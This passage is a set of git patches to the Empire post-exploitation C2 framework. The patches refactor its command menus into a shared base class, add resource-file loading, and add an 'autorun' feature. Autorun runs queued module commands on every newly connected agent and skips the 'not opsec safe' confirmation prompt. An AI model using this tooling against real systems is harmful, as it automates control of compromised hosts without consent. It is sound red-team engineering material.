self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - print 6 def do_agents(self, line): "Jump to the Agents menu." @@ -3836,7 +3834,6 @@ class StagerMenu(cmd.Cmd): def do_generate(self, line): "Generate/execute the given Empire stager." - if not self.validate_options(): return @@ -3867,7 +3864,6 @@ class StagerMenu(cmd.Cmd): os.chmod(savePath, 777) print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)) - else: print stagerOutput From 7f4988e951d2f89f842c2a514555e2afc80dd789 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 21:28:45 -0600 Subject: [PATCH 06/15] added help text for resource command --- lib/common/empire.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 3dee134..ec08771 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -391,6 +391,7 @@ class MainMenu(cmd.Cmd): pass def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) @@ -957,6 +958,7 @@ class AgentsMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -1623,6 +1625,7 @@ class PowerShellAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2428,6 +2431,7 @@ class PythonAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2903,6 +2907,7 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3124,6 +3129,7 @@ class ListenerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3378,6 +3384,7 @@ class ModuleMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3758,6 +3765,7 @@ class StagerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) From 8a1d076d14fdfeca1d1a9705d9c6b07fd95f3cbe Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:31:35 -0600 Subject: [PATCH 07/15] refactoring submenu's to not duplicate so much code --- lib/common/empire.py | 434 ++++++------------------------------------- 1 file changed, 56 insertions(+), 378 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ec08771..0344f70 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -229,11 +229,6 @@ class MainMenu(cmd.Cmd): print helpers.color("[!] Please run database_setup.py") sys.exit() - - # def preloop(self): - # traceback.print_stack() - - def cmdloop(self): """ The main cmdloop logic that handles navigation to other menus. @@ -899,38 +894,13 @@ class MainMenu(cmd.Cmd): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in options if s.startswith(mline)] - -class AgentsMenu(cmd.Cmd): - """ - The main class used by Empire to drive the 'agents' menu. - """ +class SubMenu(cmd.Cmd): + def __init__(self, mainMenu): cmd.Cmd.__init__(self) - self.mainMenu = mainMenu - self.doc_header = 'Commands' - - # set the prompt text - self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' - - messages.display_agents(self.mainMenu.agents.get_agents_db()) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) @@ -940,19 +910,19 @@ class AgentsMenu(cmd.Cmd): pass def postcmd(self, stop, line): + if line == "back": + return True if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): - "Go back to the main menu." - raise NavMain() - + "Go back a menu." + return True def do_listeners(self, line): "Jump to the listeners menu." raise NavListeners() - def do_main(self, line): "Go back to the main menu." raise NavMain() @@ -967,6 +937,41 @@ class AgentsMenu(cmd.Cmd): "Exit Empire." raise KeyboardInterrupt + def do_creds(self, line): + "Display/return credentials from the database." + self.mainMenu.do_creds(line) + + # print a nicely formatted help menu + # stolen/adapted from recon-ng + def print_topics(self, header, commands, cmdlen, maxcol): + if commands: + self.stdout.write("%s\n" % str(header)) + if self.ruler: + self.stdout.write("%s\n" % str(self.ruler * len(header))) + for command in commands: + self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) + self.stdout.write("\n") + + # def preloop(self): + # traceback.print_stack() + +class AgentsMenu(SubMenu): + """ + The main class used by Empire to drive the 'agents' menu. + """ + def __init__(self, mainMenu): + SubMenu.__init__(self, mainMenu) + + self.doc_header = 'Commands' + + # set the prompt text + self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + + messages.display_agents(self.mainMenu.agents.get_agents_db()) + + def do_back(self, line): + "Go back to the main menu." + raise NavMain() def do_list(self, line): "Lists all active agents (or listeners)." @@ -978,7 +983,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.do_list("agents " + str(line)) - def do_rename(self, line): "Rename a particular agent." @@ -1035,12 +1039,6 @@ class AgentsMenu(cmd.Cmd): except KeyboardInterrupt: print '' - - def do_creds(self, line): - "Display/return credentials from the database." - self.mainMenu.do_creds(line) - - def do_clear(self, line): "Clear one or more agent's taskings." @@ -1434,7 +1432,7 @@ class AgentsMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class AgentMenu(cmd.Cmd): +class AgentMenu(SubMenu): """ An abstracted class used by Empire to determine which agent menu type to instantiate. @@ -1452,15 +1450,14 @@ class AgentMenu(cmd.Cmd): else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) -class PowerShellAgentMenu(cmd.Cmd): +class PowerShellAgentMenu(SubMenu): """ The main class used by Empire to drive an individual 'agent' menu. """ def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) - self.mainMenu = mainMenu self.sessionID = sessionID self.doc_header = 'Agent Commands' @@ -1482,11 +1479,6 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): # traceback.print_stack() @@ -1520,23 +1512,6 @@ class PowerShellAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" @@ -1556,30 +1531,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Command not recognized.") print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." @@ -1587,8 +1538,7 @@ class PowerShellAgentMenu(cmd.Cmd): print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n" else: - cmd.Cmd.do_help(self, *args) - + SubMenu.do_help(self, *args) def do_list(self, line): "Lists all active agents (or listeners)." @@ -1600,7 +1550,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_rename(self, line): "Rename the agent." @@ -1616,7 +1565,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please enter a new name for the agent") - def do_info(self, line): "Display information about this agent" @@ -1624,12 +1572,6 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - def do_exit(self, line): "Task agent to exit." @@ -2293,13 +2235,11 @@ class PowerShellAgentMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class PythonAgentMenu(cmd.Cmd): +class PythonAgentMenu(SubMenu): def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.sessionID = sessionID @@ -2320,13 +2260,6 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): - # traceback.print_stack() - def handle_agent_event(self, signal, sender): """ Handle agent event signals. @@ -2346,54 +2279,13 @@ class PythonAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, cmds, cmdlen, maxcol): - if cmds: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for c in cmds: - self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" print helpers.color("[!] Command not recognized, use 'help' to see available commands") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." - cmd.Cmd.do_help(self, *args) + SubMenu.do_help(self, *args) def do_list(self, line): @@ -2848,14 +2740,12 @@ class PythonAgentMenu(cmd.Cmd): # return helpers.complete_path(text,line) -class ListenersMenu(cmd.Cmd): +class ListenersMenu(SubMenu): """ The main class used by Empire to drive the 'listener' menu. """ def __init__(self, mainMenu): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.doc_header = 'Listener Commands' @@ -2865,58 +2755,10 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def do_back(self, line): "Go back to the main menu." raise NavMain() - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "List all active listeners (or agents)." @@ -3074,13 +2916,11 @@ class ListenersMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class ListenerMenu(cmd.Cmd): +class ListenerMenu(SubMenu): def __init__(self, mainMenu, listenerName): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) if listenerName not in self.mainMenu.listeners.loadedListeners: print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)) @@ -3094,51 +2934,6 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - def emptyline(self): - """ - If any empty line is entered, do nothing. - """ - pass - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_info(self, line): "Display listener module options." messages.display_listener_module(self.listener) @@ -3263,15 +3058,14 @@ class ListenerMenu(cmd.Cmd): return [s[offs:] for s in languages if s.startswith(mline)] -class ModuleMenu(cmd.Cmd): +class ModuleMenu(SubMenu): """ The main class used by Empire to drive the 'module' menu. """ def __init__(self, mainMenu, moduleName, agent=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Module Commands' - self.mainMenu = mainMenu try: # get the current module/name @@ -3290,14 +3084,6 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - def validate_options(self): "Ensure all required module options are completed." @@ -3344,56 +3130,6 @@ class ModuleMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." @@ -3404,7 +3140,6 @@ class ModuleMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_reload(self, line): "Reload the current module." @@ -3681,16 +3416,14 @@ class ModuleMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class StagerMenu(cmd.Cmd): +class StagerMenu(SubMenu): """ The main class used by Empire to drive the 'stager' menu. """ def __init__(self, mainMenu, stagerName, listener=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Stager Menu' - self.mainMenu = mainMenu - # get the current stager name self.stagerName = stagerName self.stager = self.mainMenu.stagers.stagers[stagerName] @@ -3704,11 +3437,6 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - def validate_options(self): "Make sure all required stager options are completed." @@ -3725,56 +3453,6 @@ class StagerMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." From 0485b2b6fdbd4652b9d5730bb9fc9a060cc2bbd8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:45:55 -0600 Subject: [PATCH 08/15] can call agents from any submenu now --- lib/common/empire.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index c34eed6..91b843a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -925,6 +925,10 @@ class SubMenu(cmd.Cmd): "Jump to the listeners menu." raise NavListeners() + def do_agents(self, line): + "Jump to the agents menu." + raise NavAgents() + def do_main(self, line): "Go back to the main menu." raise NavMain() From 23de7bc71ac0581aaba2dd23f2df42cc9793e015 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 21:13:25 -0600 Subject: [PATCH 09/15] removing duplicate method --- lib/common/empire.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 91b843a..b2b5090 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2328,11 +2328,6 @@ class PythonAgentMenu(SubMenu): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." From 69dbc89422056203b940327b40034103e8158454 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 09:55:48 -0600 Subject: [PATCH 10/15] add autorun feature to agents menu to run all commands in a resource file on incoming agents --- empire | 1 + lib/common/agents.py | 16 ++++++++- lib/common/empire.py | 81 ++++++++++++++++++++++++++++++-------------- 3 files changed, 72 insertions(+), 26 deletions(-) diff --git a/empire b/empire index 3d5d6dd..65a59d1 100755 --- a/empire +++ b/empire @@ -1239,6 +1239,7 @@ if __name__ == '__main__': generalGroup = parser.add_argument_group('General Options') generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).') generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.') + generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.') cliGroup = parser.add_argument_group('CLI Payload Options') cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.') diff --git a/lib/common/agents.py b/lib/common/agents.py index 505a858..351d162 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,6 +1343,20 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) + if len(self.mainMenu.autoRuns) > 0: + autorunCmds = ["interact %s" % sessionID] + autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(["lastautoruncmd"]) + self.mainMenu.resourceQueue.extend(autorunCmds) + try: + #this will cause the cmdloop() to start processing the autoruns + self.mainMenu.do_agents("kickit") + except Exception as e: + if e.message == "endautorun": + pass + else: + raise e + return "STAGE2: %s" % (sessionID) else: @@ -1399,7 +1413,6 @@ class Agents: TODO: does this need self.lock? """ - if sessionID not in self.agents: dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents') return None @@ -1417,6 +1430,7 @@ class Agents: # build tasking packets for everything we have for tasking in taskings: task_name, task_data, res_id = tasking + all_task_packets += packets.build_task_packet(task_name, task_data, res_id) # get the session key for the agent diff --git a/lib/common/empire.py b/lib/common/empire.py index b2b5090..1ff1ccb 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -93,12 +93,13 @@ class MainMenu(cmd.Cmd): self.stagers = stagers.Stagers(self, args=args) self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) + self.resourceQueue = [] + self.autoRuns = [] + self.handle_args() dispatcher.send('[*] Empire starting up...', sender="Empire") - self.resourceQueue = [] - # print the loading menu messages.loading() @@ -138,6 +139,14 @@ class MainMenu(cmd.Cmd): Handle any passed arguments. """ + if self.args.resource: + resourceFile = self.args.resource[0] + if os.path.isfile(resourceFile): + self.do_resource(resourceFile) + else: + print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) + time.sleep(5) + if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager if self.args.listener: @@ -267,7 +276,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" - if self.resourceQueue and len(self.resourceQueue) > 0: + if len(self.resourceQueue) > 0: self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -377,10 +386,9 @@ class MainMenu(cmd.Cmd): ################################################### def postcmd(self, stop, line): - if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue.append(self.resourceQueue.pop(0)) - - + if len(self.resourceQueue) > 0: + nextcmd = self.resourceQueue.pop(0) + self.cmdqueue.append(nextcmd) def default(self, line): "Default handler." @@ -388,7 +396,6 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) @@ -437,7 +444,6 @@ class MainMenu(cmd.Cmd): stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") - except Exception as e: raise e @@ -904,18 +910,22 @@ class SubMenu(cmd.Cmd): self.mainMenu = mainMenu def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + if len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): pass + def postcmd(self, stop, line): if line == "back": return True - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + if len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + if nextcmd == "lastautoruncmd": + raise Exception("endautorun") + self.cmdqueue.append(nextcmd) def do_back(self, line): "Go back a menu." @@ -935,7 +945,6 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -979,6 +988,21 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() + def do_autorun(self, arg): + "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + if arg == "show": + print self.mainMenu.autoRuns + elif arg == "clear": + self.mainMenu.autoRuns = [] + else: + self.mainMenu.autoRuns = [] + with open(arg) as f: + cmds = f.read().splitlines() + #don't prompt for user confirmation when running autorun commands + noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] + self.mainMenu.autoRuns.extend(noPromptCmds) + + def do_list(self, line): "Lists all active agents (or listeners)." @@ -1447,14 +1471,15 @@ class AgentMenu(SubMenu): agentLanguage = mainMenu.agents.get_language_db(sessionID) - if agentLanguage.lower() == 'powershell': - agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - elif agentLanguage.lower() == 'python': - agent_menu = PythonAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - else: - print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + if agentLanguage.lower() == 'powershell': + agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + elif agentLanguage.lower() == 'python': + agent_menu = PythonAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + else: + print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + class PowerShellAgentMenu(SubMenu): """ @@ -2617,6 +2642,7 @@ class PythonAgentMenu(SubMenu): # Strip asterisks added by MainMenu.complete_usemodule() module = "python/%s" %(line.strip().rstrip("*")) + if module not in self.mainMenu.modules.modules: print helpers.color("[!] Error: invalid module") else: @@ -3085,7 +3111,7 @@ class ModuleMenu(SubMenu): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def validate_options(self): + def validate_options(self, prompt): "Ensure all required module options are completed." # ensure all 'Required=True' options are filled in @@ -3119,8 +3145,9 @@ class ModuleMenu(SubMenu): print helpers.color("[!] Error: module needs to run in an elevated context.") return False - # if the module isn't opsec safe, prompt before running - if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + # if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued) + if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + try: choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red")) if not (choice.lower() != "" and choice.lower()[0] == "y"): @@ -3227,7 +3254,11 @@ class ModuleMenu(SubMenu): def do_execute(self, line): "Execute the given Empire module." - if not self.validate_options(): + prompt = True + if line == "noprompt": + prompt = False + + if not self.validate_options(prompt): return if self.moduleName.lower().startswith('external/'): From e38662b38497b7481d0e937454405fba97a8d896 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 12:55:09 -0600 Subject: [PATCH 11/15] specify the agent language for the autorun, powershell or python for example --- lib/common/agents.py | 2 +- lib/common/empire.py | 48 +++++++++++++++++++++++++++++++++++--------- 2 files changed, 39 insertions(+), 11 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 351d162..329f1c6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1345,7 +1345,7 @@ class Agents: if len(self.mainMenu.autoRuns) > 0: autorunCmds = ["interact %s" % sessionID] - autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) self.mainMenu.resourceQueue.extend(autorunCmds) try: diff --git a/lib/common/empire.py b/lib/common/empire.py index 1ff1ccb..ae3dff4 100644 